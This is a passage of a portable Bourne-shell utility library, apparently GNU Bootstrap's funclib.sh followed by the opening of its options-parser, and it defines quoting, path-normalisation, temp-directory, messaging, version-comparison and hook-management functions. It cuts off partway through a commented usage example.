any number # of runs of four '\'s followed by two '\'s and then a '$'. '\' that '$'. _G_bs='\\' _G_bs2='\\\\' _G_bs4='\\\\\\\\' _G_dollar='\$' sed_double_backslash="\ s/$_G_bs4/&\\ /g s/^$_G_bs2$_G_dollar/$_G_bs&/ s/\\([^$_G_bs]\\)$_G_bs2$_G_dollar/\\1$_G_bs2$_G_bs$_G_dollar/g s/\n//g" ## ----------------- ## ## Global variables. ## ## ----------------- ## # Except for the global variables explicitly listed below, the following # functions in the '^func_' namespace, and the '^require_' namespace # variables initialised in the 'Resource management' section, sourcing # this file will not pollute your global namespace with anything # else. There's no portable way to scope variables in Bourne shell # though, so actually running these functions will sometimes place # results into a variable named after the function, and often use # temporary variables in the '^_G_' namespace. If you are careful to # avoid using those namespaces casually in your sourcing script, things # should continue to work as you expect. And, of course, you can freely # overwrite any of the functions or variables defined here before # calling anything to customize them. EXIT_SUCCESS=0 EXIT_FAILURE=1 EXIT_MISMATCH=63 # $? = 63 is used to indicate version mismatch to missing. EXIT_SKIP=77 # $? = 77 is used to indicate a skipped test to automake. # Allow overriding, eg assuming that you follow the convention of # putting '$debug_cmd' at the start of all your functions, you can get # bash to show function call trace with: # # debug_cmd='eval echo "${FUNCNAME[0]} $*" >&2' bash your-script-name debug_cmd=${debug_cmd-":"} exit_cmd=: # By convention, finish your script with: # # exit $exit_status # # so that you can set exit_status to non-zero if you want to indicate # something went wrong during execution without actually bailing out at # the point of failure. exit_status=$EXIT_SUCCESS # Work around backward compatibility issue on IRIX 6.5. On IRIX 6.4+, sh # is ksh but when the shell is invoked as "sh" and the current value of # the _XPG environment variable is not equal to 1 (one), the special # positional parameter $0, within a function call, is the name of the # function. progpath=$0 # The name of this program. progname=`$ECHO "$progpath" |$SED "$sed_basename"` # Make sure we have an absolute progpath for reexecution: case $progpath in [\\/]*|[A-Za-z]:\\*) ;; *[\\/]*) progdir=`$ECHO "$progpath" |$SED "$sed_dirname"` progdir=`cd "$progdir" && pwd` progpath=$progdir/$progname ;; *) _G_IFS=$IFS IFS=${PATH_SEPARATOR-:} for progdir in $PATH; do IFS=$_G_IFS test -x "$progdir/$progname" && break done IFS=$_G_IFS test -n "$progdir" || progdir=`pwd` progpath=$progdir/$progname ;; esac ## ----------------- ## ## Standard options. ## ## ----------------- ## # The following options affect the operation of the functions defined # below, and should be set appropriately depending on run-time para- # meters passed on the command line. opt_dry_run=false opt_quiet=false opt_verbose=false # Categories 'all' and 'none' are always available. Append any others # you will pass as the first argument to func_warning from your own # code. warning_categories= # By default, display warnings according to 'opt_warning_types'. Set # 'warning_func' to ':' to elide all warnings, or func_fatal_error to # treat the next displayed warning as a fatal error. warning_func=func_warn_and_continue # Set to 'all' to display all warnings, 'none' to suppress all # warnings, or a space delimited list of some subset of # 'warning_categories' to display only the listed warnings. opt_warning_types=all ## -------------------- ## ## Resource management. ## ## -------------------- ## # This section contains definitions for functions that each ensure a # particular resource (a file, or a non-empty configuration variable for # example) is available, and if appropriate to extract default values # from pertinent package files. Call them using their associated # 'require_*' variable to ensure that they are executed, at most, once. # # It's entirely deliberate that calling these functions can set # variables that don't obey the namespace limitations obeyed by the rest # of this file, in order that that they be as useful as possible to # callers. # require_term_colors # ------------------- # Allow display of bold text on terminals that support it. require_term_colors=func_require_term_colors func_require_term_colors () { $debug_cmd test -t 1 && { # COLORTERM and USE_ANSI_COLORS environment variables take # precedence, because most terminfo databases neglect to describe # whether color sequences are supported. test -n "${COLORTERM+set}" && : ${USE_ANSI_COLORS="1"} if test 1 = "$USE_ANSI_COLORS"; then # Standard ANSI escape sequences tc_reset='' tc_bold=''; tc_standout='' tc_red=''; tc_green='' tc_blue=''; tc_cyan='' else # Otherwise trust the terminfo database after all. test -n "`tput sgr0 2>/dev/null`" && { tc_reset=`tput sgr0` test -n "`tput bold 2>/dev/null`" && tc_bold=`tput bold` tc_standout=$tc_bold test -n "`tput smso 2>/dev/null`" && tc_standout=`tput smso` test -n "`tput setaf 1 2>/dev/null`" && tc_red=`tput setaf 1` test -n "`tput setaf 2 2>/dev/null`" && tc_green=`tput setaf 2` test -n "`tput setaf 4 2>/dev/null`" && tc_blue=`tput setaf 4` test -n "`tput setaf 5 2>/dev/null`" && tc_cyan=`tput setaf 5` } fi } require_term_colors=: } ## ----------------- ## ## Function library. ## ## ----------------- ## # This section contains a variety of useful functions to call in your # scripts. Take note of the portable wrappers for features provided by # some modern shells, which will fall back to slower equivalents on # less featureful shells. # func_append VAR VALUE # --------------------- # Append VALUE onto the existing contents of VAR. # We should try to minimise forks, especially on Windows where they are # unreasonably slow, so skip the feature probes when bash or zsh are # being used: if test set = "${BASH_VERSION+set}${ZSH_VERSION+set}"; then : ${_G_HAVE_ARITH_OP="yes"} : ${_G_HAVE_XSI_OPS="yes"} # The += operator was introduced in bash 3.1 case $BASH_VERSION in [12].* | 3.0 | 3.0*) ;; *) : ${_G_HAVE_PLUSEQ_OP="yes"} ;; esac fi # _G_HAVE_PLUSEQ_OP # Can be empty, in which case the shell is probed, "yes" if += is # useable or anything else if it does not work. test -z "$_G_HAVE_PLUSEQ_OP" \ && (eval 'x=a; x+=" b"; test "a b" = "$x"') 2>/dev/null \ && _G_HAVE_PLUSEQ_OP=yes if test yes = "$_G_HAVE_PLUSEQ_OP" then # This is an XSI compatible shell, allowing a faster implementation... eval 'func_append () { $debug_cmd eval "$1+=\$2" }' else # ...otherwise fall back to using expr, which is often a shell builtin. func_append () { $debug_cmd eval "$1=\$$1\$2" } fi # func_append_quoted VAR VALUE # ---------------------------- # Quote VALUE and append to the end of shell variable VAR, separated # by a space. if test yes = "$_G_HAVE_PLUSEQ_OP"; then eval 'func_append_quoted () { $debug_cmd func_quote_arg pretty "$2" eval "$1+=\\ \$func_quote_arg_result" }' else func_append_quoted () { $debug_cmd func_quote_arg pretty "$2" eval "$1=\$$1\\ \$func_quote_arg_result" } fi # func_append_uniq VAR VALUE # -------------------------- # Append unique VALUE onto the existing contents of VAR, assuming # entries are delimited by the first character of VALUE. For example: # # func_append_uniq options " --another-option option-argument" # # will only append to $options if " --another-option option-argument " # is not already present somewhere in $options already (note spaces at # each end implied by leading space in second argument). func_append_uniq () { $debug_cmd eval _G_current_value='`$ECHO $'$1'`' _G_delim=`expr "$2" : '\(.\)'` case $_G_delim$_G_current_value$_G_delim in *"$2$_G_delim"*) ;; *) func_append "$@" ;; esac } # func_arith TERM... # ------------------ # Set func_arith_result to the result of evaluating TERMs. test -z "$_G_HAVE_ARITH_OP" \ && (eval 'test 2 = $(( 1 + 1 ))') 2>/dev/null \ && _G_HAVE_ARITH_OP=yes if test yes = "$_G_HAVE_ARITH_OP"; then eval 'func_arith () { $debug_cmd func_arith_result=$(( $* )) }' else func_arith () { $debug_cmd func_arith_result=`expr "$@"` } fi # func_basename FILE # ------------------ # Set func_basename_result to FILE with everything up to and including # the last / stripped. if test yes = "$_G_HAVE_XSI_OPS"; then # If this shell supports suffix pattern removal, then use it to avoid # forking. Hide the definitions single quotes in case the shell chokes # on unsupported syntax... _b='func_basename_result=${1##*/}' _d='case $1 in */*) func_dirname_result=${1%/*}$2 ;; * ) func_dirname_result=$3 ;; esac' else # ...otherwise fall back to using sed. _b='func_basename_result=`$ECHO "$1" |$SED "$sed_basename"`' _d='func_dirname_result=`$ECHO "$1" |$SED "$sed_dirname"` if test "X$func_dirname_result" = "X$1"; then func_dirname_result=$3 else func_append func_dirname_result "$2" fi' fi eval 'func_basename () { $debug_cmd '"$_b"' }' # func_dirname FILE APPEND NONDIR_REPLACEMENT # ------------------------------------------- # Compute the dirname of FILE. If nonempty, add APPEND to the result, # otherwise set result to NONDIR_REPLACEMENT. eval 'func_dirname () { $debug_cmd '"$_d"' }' # func_dirname_and_basename FILE APPEND NONDIR_REPLACEMENT # -------------------------------------------------------- # Perform func_basename and func_dirname in a single function # call: # dirname: Compute the dirname of FILE. If nonempty, # add APPEND to the result, otherwise set result # to NONDIR_REPLACEMENT. # value returned in "$func_dirname_result" # basename: Compute filename of FILE. # value retuned in "$func_basename_result" # For efficiency, we do not delegate to the functions above but instead # duplicate the functionality here. eval 'func_dirname_and_basename () { $debug_cmd '"$_b"' '"$_d"' }' # func_echo ARG... # ---------------- # Echo program name prefixed message. func_echo () { $debug_cmd _G_message=$* func_echo_IFS=$IFS IFS=$nl for _G_line in $_G_message; do IFS=$func_echo_IFS $ECHO "$progname: $_G_line" done IFS=$func_echo_IFS } # func_echo_all ARG... # -------------------- # Invoke $ECHO with all args, space-separated. func_echo_all () { $ECHO "$*" } # func_echo_infix_1 INFIX ARG... # ------------------------------ # Echo program name, followed by INFIX on the first line, with any # additional lines not showing INFIX. func_echo_infix_1 () { $debug_cmd $require_term_colors _G_infix=$1; shift _G_indent=$_G_infix _G_prefix="$progname: $_G_infix: " _G_message=$* # Strip color escape sequences before counting printable length for _G_tc in "$tc_reset" "$tc_bold" "$tc_standout" "$tc_red" "$tc_green" "$tc_blue" "$tc_cyan" do test -n "$_G_tc" && { _G_esc_tc=`$ECHO "$_G_tc" | $SED "$sed_make_literal_regex"` _G_indent=`$ECHO "$_G_indent" | $SED "s|$_G_esc_tc||g"` } done _G_indent="$progname: "`echo "$_G_indent" | $SED 's|.| |g'`" " ## exclude from sc_prohibit_nested_quotes func_echo_infix_1_IFS=$IFS IFS=$nl for _G_line in $_G_message; do IFS=$func_echo_infix_1_IFS $ECHO "$_G_prefix$tc_bold$_G_line$tc_reset" >&2 _G_prefix=$_G_indent done IFS=$func_echo_infix_1_IFS } # func_error ARG... # ----------------- # Echo program name prefixed message to standard error. func_error () { $debug_cmd $require_term_colors func_echo_infix_1 " $tc_standout${tc_red}error$tc_reset" "$*" >&2 } # func_fatal_error ARG... # ----------------------- # Echo program name prefixed message to standard error, and exit. func_fatal_error () { $debug_cmd func_error "$*" exit $EXIT_FAILURE } # func_grep EXPRESSION FILENAME # ----------------------------- # Check whether EXPRESSION matches any line of FILENAME, without output. func_grep () { $debug_cmd $GREP "$1" "$2" >/dev/null 2>&1 } # func_len STRING # --------------- # Set func_len_result to the length of STRING. STRING may not # start with a hyphen. test -z "$_G_HAVE_XSI_OPS" \ && (eval 'x=a/b/c; test 5aa/bb/cc = "${#x}${x%%/*}${x%/*}${x#*/}${x##*/}"') 2>/dev/null \ && _G_HAVE_XSI_OPS=yes if test yes = "$_G_HAVE_XSI_OPS"; then eval 'func_len () { $debug_cmd func_len_result=${#1} }' else func_len () { $debug_cmd func_len_result=`expr "$1" : ".*" 2>/dev/null || echo $max_cmd_len` } fi # func_mkdir_p DIRECTORY-PATH # --------------------------- # Make sure the entire path to DIRECTORY-PATH is available. func_mkdir_p () { $debug_cmd _G_directory_path=$1 _G_dir_list= if test -n "$_G_directory_path" && test : != "$opt_dry_run"; then # Protect directory names starting with '-' case $_G_directory_path in -*) _G_directory_path=./$_G_directory_path ;; esac # While some portion of DIR does not yet exist... while test ! -d "$_G_directory_path"; do # ...make a list in topmost first order. Use a colon delimited # list incase some portion of path contains whitespace. _G_dir_list=$_G_directory_path:$_G_dir_list # If the last portion added has no slash in it, the list is done case $_G_directory_path in */*) ;; *) break ;; esac # ...otherwise throw away the child directory and loop _G_directory_path=`$ECHO "$_G_directory_path" | $SED -e "$sed_dirname"` done _G_dir_list=`$ECHO "$_G_dir_list" | $SED 's|:*$||'` func_mkdir_p_IFS=$IFS; IFS=: for _G_dir in $_G_dir_list; do IFS=$func_mkdir_p_IFS # mkdir can fail with a 'File exist' error if two processes # try to create one of the directories concurrently. Don't # stop in that case! $MKDIR "$_G_dir" 2>/dev/null || : done IFS=$func_mkdir_p_IFS # Bail out if we (or some other process) failed to create a directory. test -d "$_G_directory_path" || \ func_fatal_error "Failed to create '$1'" fi } # func_mktempdir [BASENAME] # ------------------------- # Make a temporary directory that won't clash with other running # libtool processes, and avoids race conditions if possible. If # given, BASENAME is the basename for that directory. func_mktempdir () { $debug_cmd _G_template=${TMPDIR-/tmp}/${1-$progname} if test : = "$opt_dry_run"; then # Return a directory name, but don't create it in dry-run mode _G_tmpdir=$_G_template-$$ else # If mktemp works, use that first and foremost _G_tmpdir=`mktemp -d "$_G_template-XXXXXXXX" 2>/dev/null` if test ! -d "$_G_tmpdir"; then # Failing that, at least try and use $RANDOM to avoid a race _G_tmpdir=$_G_template-${RANDOM-0}$$ func_mktempdir_umask=`umask` umask 0077 $MKDIR "$_G_tmpdir" umask $func_mktempdir_umask fi # If we're not in dry-run mode, bomb out on failure test -d "$_G_tmpdir" || \ func_fatal_error "cannot create temporary directory '$_G_tmpdir'" fi $ECHO "$_G_tmpdir" } # func_normal_abspath PATH # ------------------------ # Remove doubled-up and trailing slashes, "." path components, # and cancel out any ".." path components in PATH after making # it an absolute path. func_normal_abspath () { $debug_cmd # These SED scripts presuppose an absolute path with a trailing slash. _G_pathcar='s|^/\([^/]*\).*$|\1|' _G_pathcdr='s|^/[^/]*||' _G_removedotparts=':dotsl s|/\./|/|g t dotsl s|/\.$|/|' _G_collapseslashes='s|/\{1,\}|/|g' _G_finalslash='s|/*$|/|' # Start from root dir and reassemble the path. func_normal_abspath_result= func_normal_abspath_tpath=$1 func_normal_abspath_altnamespace= case $func_normal_abspath_tpath in "") # Empty path, that just means $cwd. func_stripname '' '/' "`pwd`" func_normal_abspath_result=$func_stripname_result return ;; # The next three entries are used to spot a run of precisely # two leading slashes without using negated character classes; # we take advantage of case's first-match behaviour. ///*) # Unusual form of absolute path, do nothing. ;; //*) # Not necessarily an ordinary path; POSIX reserves leading '//' # and for example Cygwin uses it to access remote file shares # over CIFS/SMB, so we conserve a leading double slash if found. func_normal_abspath_altnamespace=/ ;; /*) # Absolute path, do nothing. ;; *) # Relative path, prepend $cwd. func_normal_abspath_tpath=`pwd`/$func_normal_abspath_tpath ;; esac # Cancel out all the simple stuff to save iterations. We also want # the path to end with a slash for ease of parsing, so make sure # there is one (and only one) here. func_normal_abspath_tpath=`$ECHO "$func_normal_abspath_tpath" | $SED \ -e "$_G_removedotparts" -e "$_G_collapseslashes" -e "$_G_finalslash"` while :; do # Processed it all yet? if test / = "$func_normal_abspath_tpath"; then # If we ascended to the root using ".." the result may be empty now. if test -z "$func_normal_abspath_result"; then func_normal_abspath_result=/ fi break fi func_normal_abspath_tcomponent=`$ECHO "$func_normal_abspath_tpath" | $SED \ -e "$_G_pathcar"` func_normal_abspath_tpath=`$ECHO "$func_normal_abspath_tpath" | $SED \ -e "$_G_pathcdr"` # Figure out what to do with it case $func_normal_abspath_tcomponent in "") # Trailing empty path component, ignore it. ;; ..) # Parent dir; strip last assembled component from result. func_dirname "$func_normal_abspath_result" func_normal_abspath_result=$func_dirname_result ;; *) # Actual path component, append it. func_append func_normal_abspath_result "/$func_normal_abspath_tcomponent" ;; esac done # Restore leading double-slash if one was found on entry. func_normal_abspath_result=$func_normal_abspath_altnamespace$func_normal_abspath_result } # func_notquiet ARG... # -------------------- # Echo program name prefixed message only when not in quiet mode. func_notquiet () { $debug_cmd $opt_quiet || func_echo ${1+"$@"} # A bug in bash halts the script if the last line of a function # fails when set -e is in force, so we need another command to # work around that: : } # func_relative_path SRCDIR DSTDIR # -------------------------------- # Set func_relative_path_result to the relative path from SRCDIR to DSTDIR. func_relative_path () { $debug_cmd func_relative_path_result= func_normal_abspath "$1" func_relative_path_tlibdir=$func_normal_abspath_result func_normal_abspath "$2" func_relative_path_tbindir=$func_normal_abspath_result # Ascend the tree starting from libdir while :; do # check if we have found a prefix of bindir case $func_relative_path_tbindir in $func_relative_path_tlibdir) # found an exact match func_relative_path_tcancelled= break ;; $func_relative_path_tlibdir*) # found a matching prefix func_stripname "$func_relative_path_tlibdir" '' "$func_relative_path_tbindir" func_relative_path_tcancelled=$func_stripname_result if test -z "$func_relative_path_result"; then func_relative_path_result=. fi break ;; *) func_dirname $func_relative_path_tlibdir func_relative_path_tlibdir=$func_dirname_result if test -z "$func_relative_path_tlibdir"; then # Have to descend all the way to the root! func_relative_path_result=../$func_relative_path_result func_relative_path_tcancelled=$func_relative_path_tbindir break fi func_relative_path_result=../$func_relative_path_result ;; esac done # Now calculate path; take care to avoid doubling-up slashes. func_stripname '' '/' "$func_relative_path_result" func_relative_path_result=$func_stripname_result func_stripname '/' '/' "$func_relative_path_tcancelled" if test -n "$func_stripname_result"; then func_append func_relative_path_result "/$func_stripname_result" fi # Normalisation. If bindir is libdir, return '.' else relative path. if test -n "$func_relative_path_result"; then func_stripname './' '' "$func_relative_path_result" func_relative_path_result=$func_stripname_result fi test -n "$func_relative_path_result" || func_relative_path_result=. : } # func_quote_portable EVAL ARG # ---------------------------- # Internal function to portably implement func_quote_arg. Note that we still # keep attention to performance here so we as much as possible try to avoid # calling sed binary (so far O(N) complexity as long as func_append is O(1)). func_quote_portable () { $debug_cmd func_quote_portable_result=$2 # one-time-loop (easy break) while true do if $1; then func_quote_portable_result=`$ECHO "$2" | $SED \ -e "$sed_double_quote_subst" -e "$sed_double_backslash"` break fi # Quote for eval. case $func_quote_portable_result in *[\\\`\"\$]*) case $func_quote_portable_result in *[\[\*\?]*) func_quote_portable_result=`$ECHO "$func_quote_portable_result" \ | $SED "$sed_quote_subst"` break ;; esac func_quote_portable_old_IFS=$IFS for _G_char in '\' '`' '"' '$' do # STATE($1) PREV($2) SEPARATOR($3) set start "" "" func_quote_portable_result=dummy"$_G_char$func_quote_portable_result$_G_char"dummy IFS=$_G_char for _G_part in $func_quote_portable_result do case $1 in quote) func_append func_quote_portable_result "$3$2" set quote "$_G_part" "\\$_G_char" ;; start) set first "" "" func_quote_portable_result= ;; first) set quote "$_G_part" "" ;; esac done done IFS=$func_quote_portable_old_IFS ;; *) ;; esac break done func_quote_portable_unquoted_result=$func_quote_portable_result case $func_quote_portable_result in # double-quote args containing shell metacharacters to delay # word splitting, command substitution and variable expansion # for a subsequent eval. # many bourne shells cannot handle close brackets correctly # in scan sets, so we specify it separately. *[\[\~\#\^\&\*\(\)\{\}\|\;\<\>\?\'\ \ ]*|*]*|"") func_quote_portable_result=\"$func_quote_portable_result\" ;; esac } # func_quotefast_eval ARG # ----------------------- # Quote one ARG (internal). This is equivalent to 'func_quote_arg eval ARG', # but optimized for speed. Result is stored in $func_quotefast_eval. if test xyes = `(x=; printf -v x %q yes; echo x"$x") 2>/dev/null`; then printf -v _GL_test_printf_tilde %q '~' if test '\~' = "$_GL_test_printf_tilde"; then func_quotefast_eval () { printf -v func_quotefast_eval_result %q "$1" } else # Broken older Bash implementations. Make those faster too if possible. func_quotefast_eval () { case $1 in '~'*) func_quote_portable false "$1" func_quotefast_eval_result=$func_quote_portable_result ;; *) printf -v func_quotefast_eval_result %q "$1" ;; esac } fi else func_quotefast_eval () { func_quote_portable false "$1" func_quotefast_eval_result=$func_quote_portable_result } fi # func_quote_arg MODEs ARG # ------------------------ # Quote one ARG to be evaled later. MODEs argument may contain zero or more # specifiers listed below separated by ',' character. This function returns two # values: # i) func_quote_arg_result # double-quoted (when needed), suitable for a subsequent eval # ii) func_quote_arg_unquoted_result # has all characters that are still active within double # quotes backslashified. Available only if 'unquoted' is specified. # # Available modes: # ---------------- # 'eval' (default) # - escape shell special characters # 'expand' # - the same as 'eval'; but do not quote variable references # 'pretty' # - request aesthetic output, i.e. '"a b"' instead of 'a\ b'. This might # be used later in func_quote to get output like: 'echo "a b"' instead # of 'echo a\ b'. This is slower than default on some shells. # 'unquoted' # - produce also $func_quote_arg_unquoted_result which does not contain # wrapping double-quotes. # # Examples for 'func_quote_arg pretty,unquoted string': # # string | *_result | *_unquoted_result # ------------+-----------------------+------------------- # " | \" | \" # a b | "a b" | a b # "a b" | "\"a b\"" | \"a b\" # * | "*" | * # z="${x-$y}" | "z=\"\${x-\$y}\"" | z=\"\${x-\$y}\" # # Examples for 'func_quote_arg pretty,unquoted,expand string': # # string | *_result | *_unquoted_result # --------------+---------------------+-------------------- # z="${x-$y}" | "z=\"${x-$y}\"" | z=\"${x-$y}\" func_quote_arg () { _G_quote_expand=false case ,$1, in *,expand,*) _G_quote_expand=: ;; esac case ,$1, in *,pretty,*|*,expand,*|*,unquoted,*) func_quote_portable $_G_quote_expand "$2" func_quote_arg_result=$func_quote_portable_result func_quote_arg_unquoted_result=$func_quote_portable_unquoted_result ;; *) # Faster quote-for-eval for some shells. func_quotefast_eval "$2" func_quote_arg_result=$func_quotefast_eval_result ;; esac } # func_quote MODEs ARGs... # ------------------------ # Quote all ARGs to be evaled later and join them into single command. See # func_quote_arg's description for more info. func_quote () { $debug_cmd _G_func_quote_mode=$1 ; shift func_quote_result= while test 0 -lt $#; do func_quote_arg "$_G_func_quote_mode" "$1" if test -n "$func_quote_result"; then func_append func_quote_result " $func_quote_arg_result" else func_append func_quote_result "$func_quote_arg_result" fi shift done } # func_stripname PREFIX SUFFIX NAME # --------------------------------- # strip PREFIX and SUFFIX from NAME, and store in func_stripname_result. # PREFIX and SUFFIX must not contain globbing or regex special # characters, hashes, percent signs, but SUFFIX may contain a leading # dot (in which case that matches only a dot). if test yes = "$_G_HAVE_XSI_OPS"; then eval 'func_stripname () { $debug_cmd # pdksh 5.2.14 does not do ${X%$Y} correctly if both X and Y are # positional parameters, so assign one to ordinary variable first. func_stripname_result=$3 func_stripname_result=${func_stripname_result#"$1"} func_stripname_result=${func_stripname_result%"$2"} }' else func_stripname () { $debug_cmd case $2 in .*) func_stripname_result=`$ECHO "$3" | $SED -e "s%^$1%%" -e "s%\\\\$2\$%%"`;; *) func_stripname_result=`$ECHO "$3" | $SED -e "s%^$1%%" -e "s%$2\$%%"`;; esac } fi # func_show_eval CMD [FAIL_EXP] # ----------------------------- # Unless opt_quiet is true, then output CMD. Then, if opt_dryrun is # not true, evaluate CMD. If the evaluation of CMD fails, and FAIL_EXP # is given, then evaluate it. func_show_eval () { $debug_cmd _G_cmd=$1 _G_fail_exp=${2-':'} func_quote_arg pretty,expand "$_G_cmd" eval "func_notquiet $func_quote_arg_result" $opt_dry_run || { eval "$_G_cmd" _G_status=$? if test 0 -ne "$_G_status"; then eval "(exit $_G_status); $_G_fail_exp" fi } } # func_show_eval_locale CMD [FAIL_EXP] # ------------------------------------ # Unless opt_quiet is true, then output CMD. Then, if opt_dryrun is # not true, evaluate CMD. If the evaluation of CMD fails, and FAIL_EXP # is given, then evaluate it. Use the saved locale for evaluation. func_show_eval_locale () { $debug_cmd _G_cmd=$1 _G_fail_exp=${2-':'} $opt_quiet || { func_quote_arg expand,pretty "$_G_cmd" eval "func_echo $func_quote_arg_result" } $opt_dry_run || { eval "$_G_user_locale $_G_cmd" _G_status=$? eval "$_G_safe_locale" if test 0 -ne "$_G_status"; then eval "(exit $_G_status); $_G_fail_exp" fi } } # func_tr_sh # ---------- # Turn $1 into a string suitable for a shell variable name. # Result is stored in $func_tr_sh_result. All characters # not in the set a-zA-Z0-9_ are replaced with '_'. Further, # if $1 begins with a digit, a '_' is prepended as well. func_tr_sh () { $debug_cmd case $1 in [0-9]* | *[!a-zA-Z0-9_]*) func_tr_sh_result=`$ECHO "$1" | $SED -e 's/^\([0-9]\)/_\1/' -e 's/[^a-zA-Z0-9_]/_/g'` ;; * ) func_tr_sh_result=$1 ;; esac } # func_verbose ARG... # ------------------- # Echo program name prefixed message in verbose mode only. func_verbose () { $debug_cmd $opt_verbose && func_echo "$*" : } # func_warn_and_continue ARG... # ----------------------------- # Echo program name prefixed warning message to standard error. func_warn_and_continue () { $debug_cmd $require_term_colors func_echo_infix_1 "${tc_red}warning$tc_reset" "$*" >&2 } # func_warning CATEGORY ARG... # ---------------------------- # Echo program name prefixed warning message to standard error. Warning # messages can be filtered according to CATEGORY, where this function # elides messages where CATEGORY is not listed in the global variable # 'opt_warning_types'. func_warning () { $debug_cmd # CATEGORY must be in the warning_categories list! case " $warning_categories " in *" $1 "*) ;; *) func_internal_error "invalid warning category '$1'" ;; esac _G_category=$1 shift case " $opt_warning_types " in *" $_G_category "*) $warning_func ${1+"$@"} ;; esac } # func_sort_ver VER1 VER2 # ----------------------- # 'sort -V' is not generally available. # Note this deviates from the version comparison in automake # in that it treats 1.5 < 1.5.0, and treats 1.4.4a < 1.4-p3a # but this should suffice as we won't be specifying old # version formats or redundant trailing .0 in bootstrap.conf. # If we did want full compatibility then we should probably # use m4_version_compare from autoconf. func_sort_ver () { $debug_cmd printf '%s\n%s\n' "$1" "$2" \ | sort -t. -k 1,1n -k 2,2n -k 3,3n -k 4,4n -k 5,5n -k 6,6n -k 7,7n -k 8,8n -k 9,9n } # func_lt_ver PREV CURR # --------------------- # Return true if PREV and CURR are in the correct order according to # func_sort_ver, otherwise false. Use it like this: # # func_lt_ver "$prev_ver" "$proposed_ver" || func_fatal_error "..." func_lt_ver () { $debug_cmd test "x$1" = x`func_sort_ver "$1" "$2" | $SED 1q` } # Local variables: # mode: shell-script # sh-indentation: 2 # eval: (add-hook 'before-save-hook 'time-stamp) # time-stamp-pattern: "10/scriptversion=%:y-%02m-%02d.%02H; # UTC" # time-stamp-time-zone: "UTC" # End: #! /bin/sh # A portable, pluggable option parser for Bourne shell. # Written by Gary V. Vaughan, 2010 # This is free software. There is NO warranty; not even for # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # # Copyright (C) 2010-2018 Bootstrap Authors # # This file is dual licensed under the terms of the MIT license # , and GPL version 3 or later # . You must apply one of # these licenses when using or redistributing this software or any of # the files within it. See the URLs above, or the file `LICENSE` # included in the Bootstrap distribution for the full license texts. # Please report bugs or propose patches to: # # Set a version string for this script. scriptversion=2018-07-24.06; # UTC ## ------ ## ## Usage. ## ## ------ ## # This file is a library for parsing options in your shell scripts along # with assorted other useful supporting features that you can make use # of too. # # For the simplest scripts you might need only: # # #!/bin/sh # . relative/path/to/funclib.sh # . relative/path/to/options-parser # scriptversion=1.0 # func_options ${1+"$@"} # eval set dummy "$func_options_result"; shift # ...rest of your script... # # In order for the '--version' option to work, you will need to have a # suitably formatted comment like the one at the top of this file # starting with '# Written by ' and ending with '# Copyright'. # # For '-h' and '--help' to work, you will also need a one line # description of your script's purpose in a comment directly above the # '# Written by ' line, like the one at the top of this file. # # The default options also support '--debug', which will turn on shell # execution tracing (see the comment above debug_cmd below for another # use), and '--verbose' and the func_verbose function to allow your script # to display verbose messages only when your user has specified # '--verbose'. # # After sourcing this file, you can plug in processing for additional # options by amending the variables from the 'Configuration' section # below, and following the instructions in the 'Option parsing' # section further down. ## -------------- ## ## Configuration. ## ## -------------- ## # You should override these variables in your script after sourcing this # file so that they reflect the customisations you have added to the # option parser. # The usage line for option parsing errors and the start of '-h' and # '--help' output messages. You can embed shell variables for delayed # expansion at the time the message is displayed, but you will need to # quote other shell meta-characters carefully to prevent them being # expanded when the contents are evaled. usage='$progpath [OPTION]...' # Short help message in response to '-h' and '--help'. Add to this or # override it after sourcing this library to reflect the full set of # options your script accepts. usage_message="\ --debug enable verbose shell tracing -W, --warnings=CATEGORY report the warnings falling in CATEGORY [all] -v, --verbose verbosely report processing --version print version information and exit -h, --help print short or long help message and exit " # Additional text appended to 'usage_message' in response to '--help'. long_help_message=" Warning categories include: 'all' show all warnings 'none' turn off all the warnings 'error' warnings are treated as fatal errors" # Help message printed before fatal option parsing errors. fatal_help="Try '\$progname --help' for more information." ## ------------------------- ## ## Hook function management. ## ## ------------------------- ## # This section contains functions for adding, removing, and running hooks # in the main code. A hook is just a list of function names that can be # run in order later on. # func_hookable FUNC_NAME # ----------------------- # Declare that FUNC_NAME will run hooks added with # 'func_add_hook FUNC_NAME ...'. func_hookable () { $debug_cmd func_append hookable_fns " $1" } # func_add_hook FUNC_NAME HOOK_FUNC # --------------------------------- # Request that FUNC_NAME call HOOK_FUNC before it returns. FUNC_NAME must # first have been declared "hookable" by a call to 'func_hookable'. func_add_hook () { $debug_cmd case " $hookable_fns " in *" $1 "*) ;; *) func_fatal_error "'$1' does not accept hook functions." ;; esac eval func_append ${1}_hooks '" $2"' } # func_remove_hook FUNC_NAME HOOK_FUNC # ------------------------------------ # Remove HOOK_FUNC from the list of hook functions to be called by # FUNC_NAME. func_remove_hook () { $debug_cmd eval ${1}_hooks='`$ECHO "\$'$1'_hooks" |$SED "s| '$2'||"`' } # func_propagate_result FUNC_NAME_A FUNC_NAME_B # --------------------------------------------- # If the *_result variable of FUNC_NAME_A _is set_, assign its value to # *_result variable of FUNC_NAME_B. func_propagate_result () { $debug_cmd func_propagate_result_result=: if eval "test \"\${${1}_result+set}\" = set" then eval "${2}_result=\$${1}_result" else func_propagate_result_result=false fi } # func_run_hooks FUNC_NAME [ARG]... # --------------------------------- # Run all hook functions registered to FUNC_NAME. # It's assumed that the list of hook functions contains nothing more # than a whitespace-delimited list of legal shell function names, and # no effort is wasted trying to catch shell meta-characters or preserve # whitespace. func_run_hooks () { $debug_cmd case " $hookable_fns " in *" $1 "*) ;; *) func_fatal_error "'$1' does not support hook functions." ;; esac eval _G_hook_fns=\$$1_hooks; shift for _G_hook in $_G_hook_fns; do func_unset "${_G_hook}_result" eval $_G_hook '${1+"$@"}' func_propagate_result $_G_hook func_run_hooks if $func_propagate_result_result; then eval set dummy "$func_run_hooks_result"; shift fi done } ## --------------- ## ## Option parsing. ## ## --------------- ## # In order to add your own option parsing hooks, you must accept the # full positional parameter list from your hook function. You may remove # or edit any options that you action, and then pass back the remaining # unprocessed options in '_result', escaped # suitably for 'eval'. # # The '_result' variable is automatically unset # before your hook gets called; for best performance, only set the # *_result variable when necessary (i.e. don't call the 'func_quote' # function unnecessarily because it can be an expensive operation on some # machines). # # Like this: # # my_options_prep () # { # $debug_cmd # # # Extend the existing usage message. # usage_message=$usage_message' # -s, --silent don'\''t print informational messages # ' # # No change in '$@' (ignored completely by this hook). Leave # # my_options_prep_result variable intact. # } # func_add_hook func_options_prep my_options_prep # # # my_silent_option () # { # 